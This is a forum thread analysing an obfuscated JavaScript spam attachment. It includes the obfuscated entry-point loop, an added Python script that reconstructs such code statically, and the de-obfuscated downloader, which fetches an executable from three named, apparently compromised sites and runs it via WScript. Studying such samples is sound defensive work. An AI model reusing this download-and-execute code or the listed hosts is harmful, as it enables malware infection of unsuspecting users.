
Malware .js email attachments - execution on 9x/me ?



Posted

Last week (and again today), for the first time ever, I'm seeing zip-compressed .js files as spam email attachments. These are polymorphic files that seem to have very low initial detection rates (such as less than 10 out of 57 at Virus Total). An analysis of today's .JS file can be found here: http://wepawet.iseclab.org/view.php?hash=1404be252a3d2861fdffc6af412d2495&type=js

I'm trying to understand how an end-user, using a Windows-based email client (such as Outlook, Thunderbird, etc.) would end up executing the attachment. For example, after saving the attachment and decompressing the .zip file, I dragged the resulting .js file over to a few of my installed browsers.

Firefox 2.0.0.20, Netscape 9.0.0.6 and Opera 12.02 all did the same thing - just opened it as a text file and displayed the text of the .js file. IE 6 seems to have actually known it was a script file, because it first threw up a warning if I wanted to open, run or save a potentially dangerous file. I said sure - run it. It then threw up this error:

--------------

Windows Script Host

Script: (path to js file)\Invoice_whatever.doc.js

Line: 1

Char: 15876

Error: Arguments are of the wrong type, are out of acceptable range, or are in conflict with one another.

Code: 800A0BB9

Source: ADODB.Stream

---------------

I had to dismiss that error message about 10 times before it went away.

I would have thought that Opera 12, being somewhat "new" or newer, would have known how to handle or execute a .js file. Is IE the only browser that opens / executes .js files if you drop the file onto the browser? Is this unique for IE6, or do other versions of IE also do this? Do newer versions of Mozilla-based browsers execute .js files if you drop them on them?

Is the Windows Script Host (or file-handler?) that Win-9x/me has somehow "invulnerable" to this seemingly recent development in malware email attachment techniques?


Posted

IE6 is vulnerable; it may just be that the script itself is, by pure luck, not compatible with the scripting host used on W9x.

W9x is still vulnerable to many new developments, it just depends. I'd not bet on it "being too old to be vulnerable", for I know it is not.

Besides that, many pros using W9x use the latest supported Opera, which is actually quite fast and works well on many contemporary pages, but unfortunately is HIGHLY vulnerable.

Using a browser or eMail for the internet on W9x is dangerous, it always has been, it always will be.

That's the main reason I use Dual-Boot on my old PCs with some serious modern OS (like W10 or Kali Linux), with a hardened browser, as they at least offer some resistance.

 

Cheers, Ragnar G.D.

Posted

I ran the .js file through an on-line script "beautifier" (jsbeautifier.org) and saved the result as a test .js file. FF2 opens it as a text file. IE6 opens it as a script, gives me a warning, and then gives the same error as above - except that I know what line the error is happening on. It's the very last line of the file. Here is what the last few lines look like:

```javascript
for (var xuow = 1; xuow <= 229; xuow++) {
    tz += this['nbny' + (xuow * 3562)]();
};
this[nbny243()](tz);
```

The line starting with "this" is line 817 - the line that the error is happening on (which is also the last line of the file). So I don't know if this file was malformed to start with, or what...

Posted

Wow, that is some advanced js-foo. Hiding the entry-point, I guess, but without the rest of the code I can't be sure.

Still, 'nbny243()' ought to be some function, to deliver feed for the 'this' object, but is most probably not defined. So I guess it's simply a bug. But then again, I did not see this 'this[]' syntax ever before.

Did you try that one out in a sandbox with a script-enabled browser? Perhaps only the first part as a snippet, to avoid some undesired payload?

Posted

If you want to see the "beautified" (more readable) version, I put a copy here: http://pastebin.com/raw.php?i=K7DjsewG

See the first link (to wepawet.iseclab.org) I gave in the first post. That is the "de-obfuscated" version of this JS script. I don't know if taking the de-obfuscated output and saving it as a text file (with .js suffix) would result in a functional .js file (that you can throw into a browser to see what it does). ??? I tried it and got nowhere.

Posted

I made these small changes and it runs in IE5.

```html
<script>
...
document.writeln(tz) //this[nbny243()](tz);
</script>
```

The numerous functions each return a short string and are declared in jumbled order. The loop calls all functions in the proper order and concatenates the strings into the real script. The call to nbny243 evaluates the full string, causing it to execute. The full string is:

function dl(fr) { var b = "dickinsonwrestlingclub.com www.fibrasinteticafm.com laterrazzafiorita.it".split(" "); for (var i=0; i 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b+"/document.php?rnd="+fr+"&id="+str, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(8391); dl(5142); dl(2053);
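The reconstruction described in the post above (out-of-order `nbnyNNNN` fragment functions, an indexed loop that concatenates them, and a final `this[...]()` call) can be done statically, without handing the script to a script host. The following is an added example, not code from the thread or from the malware sample: it works on a constructed, benign stand-in that only copies the layout (the names `nbny`, `xuow` and `tz` come from the thread's snippet; every fragment and the `eval` resolver are assumptions) and also reports which fragments are missing, which is the kind of breakage that produced the thread's last-line error.

```python
import re

# Constructed benign sample (NOT the attachment) copying the layout from the thread:
# fragment functions declared out of order, an index loop, and a this[fn()](acc) call.
SAMPLE_JS = r'''
var tz = "";
function nbny10686() { return "ign\");"; }
function nbny3562() { return "WScript.E"; }
function nbny14248() { return ""; }
function nbny7124() { return "cho(\"ben"; }
function nbny243() { return "eval"; }
for (var xuow = 1; xuow <= 4; xuow++) {
  tz += this['nbny' + (xuow * 3562)]();
};
this[nbny243()](tz);
'''

# function <name>() { return "<fragment>"; }
FUNC_RE = re.compile(r'function\s+(\w+)\s*\(\)\s*\{\s*return\s*"((?:[^"\\]|\\.)*)"\s*;?\s*\}')
# for (var v = a; v <= b; ...) { acc += this['prefix' + (v * step)]();
LOOP_RE = re.compile(
    r"for\s*\(\s*var\s+(\w+)\s*=\s*(\d+)\s*;\s*\1\s*<=\s*(\d+)\s*;[^)]*\)\s*\{"
    r"\s*(\w+)\s*\+=\s*this\[\s*'(\w+)'\s*\+\s*\(\s*\1\s*\*\s*(\d+)\s*\)\s*\]\s*\(\s*\)")
# this[<resolver>()](<arg>)
ENTRY_RE = re.compile(r"this\[\s*(\w+)\(\)\s*\]\s*\(\s*(\w+)\s*\)")

def fragments(js_text):
    """Map each one-line 'return "..."' function to its unescaped string."""
    return {name: re.sub(r'\\(.)', r'\1', body) for name, body in FUNC_RE.findall(js_text)}

def reconstruct_stage2(js_text):
    """Rebuild the concatenated string statically. Returns (text, missing_names)."""
    chunks = fragments(js_text)
    m = LOOP_RE.search(js_text)
    if not m:
        raise ValueError("concatenation loop not found")
    _, start, end, _acc, prefix, step = m.groups()
    parts, missing = [], []
    for i in range(int(start), int(end) + 1):
        name = f"{prefix}{i * int(step)}"
        if name in chunks:
            parts.append(chunks[name])
        else:
            missing.append(name)  # a truncated or broken sample shows up here
    return "".join(parts), missing

def find_entry_point(js_text):
    """Resolve this[<fn>()](<arg>): the resolver name, what it returns, and the argument."""
    m = ENTRY_RE.search(js_text)
    if not m:
        return None
    resolver, arg = m.groups()
    return resolver, fragments(js_text).get(resolver), arg
```

On the constructed sample `reconstruct_stage2` yields `WScript.Echo("benign");` with no missing fragments, and `find_entry_point` shows that `nbny243` resolves to `eval`; on a real sample the assembled text is what to read next, still without running it.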

Posted (edited)

Those sites are seemingly "normal" ones. The laterrazzafiorita.it is a small Bed and Breakfast in Sardinia, please read as "home made, possibly easily hackable"; I wouldn't be surprised if some malicious contents have been uploaded to it without the owner knowing about it. Someone already notified them:

http://www.laterrazzafiorita.it/index.php/commenti

but given the kind of site it is unlikely that anyone will actually notice the note and do something.

https://forums.spybot.info/showthread.php?23632-SPAM-frauds-fakes-and-other-MALWARE-deliveries&s=febb317caa19ccf6b3f7c6e96109cdb8&p=466056&viewfull=1#post466056

https://www.virustotal.com/en/ip-address/208.43.65.115/information/

Same goes for the fibrasinteticafm.com, they are producers of some synthetic fibers in Brazil (via Wayback Machine):

https://web.archive.org/web/20141219174623/http://www.fibrasinteticafm.com/

it has been clearly hacked to contain *any* Viagra/Drug selling crap or scam or possibly worse, example (via Google Web Cache - source):

http://webcache.googleusercontent.com/search?q=cache:dENIi0BGsSoJ:www.fibrasinteticafm.com/vjfh/list-of-radiometric-dating-methods/&hl=it&gl=us&strip=0&vwsrc=1

jaclaz

Edited by jaclaz

Posted

So what is the relationship to the beautifier output vs the wepawet.iseclab.org output?

The wepawet.iseclab.org output indicates a dependency on or utilization of an ActiveX component, and it seems to be constructing a target .exe file to download from the above-mentioned domains based on some sort of algorithm using a random number generator. Would be useful to generate one and download the payload from one of those domains - assuming they're still serving up the payload.

Posted

It is seemingly a Kovter and/or Miuref/Boaxxe variant:

http://cybertracker.malwarehunterteam.com/malicious/860

https://www.dshield.org/forums/diary/Malicious+spam+continues+to+serve+zip+archives+of+javascript+files/19973/

I just made a phone call to the good people at the "la terrazza fiorita" B&B and as expected they knew nothing of the issue, but they said they will alert their webmaster to look into the matter.

jaclaz
